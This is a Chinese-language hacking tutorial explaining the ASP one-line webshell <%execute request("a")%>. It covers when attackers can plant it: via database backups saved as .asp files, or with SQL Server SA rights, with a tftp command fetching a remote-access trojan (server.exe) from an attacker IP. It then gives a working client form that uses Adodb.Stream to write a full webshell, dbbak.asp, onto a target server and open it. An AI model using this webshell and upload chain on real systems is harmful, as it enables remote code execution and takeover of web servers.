通过HTTP协议来访问
一句话木马的使用范围(我只列举了2种):

1)只有数据库备份的情况
数据库备份成asp文件时候，不出现“ 编译错误，缺少脚本关闭标志%>"

2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快)

tftp -i ip get server.exe


一句话木马%execute request("a")%>的原理:

首先知道
execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码%execute request("a")%>可以这样来解释：

% 
if request("a")>"" then execute request("a") 
%>

如果a不为空的时候执行.执行什么呢?...

if a != 0

下面我们来看一下客户端:

form action=http://192.168.0.28/shell.asp method=post> 
textarea name=l cols=120 rows=10 width=45> 
set lP=server.CreateObject("Adodb.Stream") '创建Adodb.Stream组件..
lP.Open 
lP.Type=2 
lP.CharSet="gb2312" 
lP.writetext request("p") 
lP.SaveToFile server.mappath("dbbak.asp"),2 
lP.Close 
set lP=nothing 
response.redirect "dbbak.asp" 
/textarea> 
textarea name=p cols=120 rows=10 width=45>要提交的数据/textarea>BR>center>br> 
input type=submit value=提交>


Adodb.Stream负责上传读取数据到服务器:

组件："Adodb.Stream" 
有下列方法： 
Cancel 方法 
使用方法如下 
Object.Cancel 
说明：取消执行挂起的异步 Execute 或 Open 方法的调用。


WriteText 方法 
使用方法如下： 
Object.Write(Data,[Options]) 
说明：将指定的文本数据装入对像中。 
参数说明：Data 为指定的要写入的内容。 
Options 写入的选项，可不指定，可选参数如下： 
adWriteChar =0 
adWriteLine =1

SaveToFile 方法 
使用方法如下： 
Object.SaveToFile(FileName,[Options]) 
说明：将对像的内容写到FileName指定的文件中

也就是我们保存木马的文件名dbbak.asp 
参数说明：FileName指定的文件 
Options 存取的选项，可不指定，可选参数如下： 
adSaveCreateNotExist =1 
adSaveCreateOverWrite =2

提交一句话木马后，a的值为空 等待一个写入的值 访问http://www.***.com/**.asp就是等待的过程 如何准备用execute()这个函数来执行...

创建一个Adodb.Stream，负责把我们的大马写入到服务器当中...

同时，这个组件定义的变量SaveToFile定义了我们大马的名字..dbbak.asp

提交到服务器后execute()函数检测到a的值不为空了，所以就执行了我们的大马！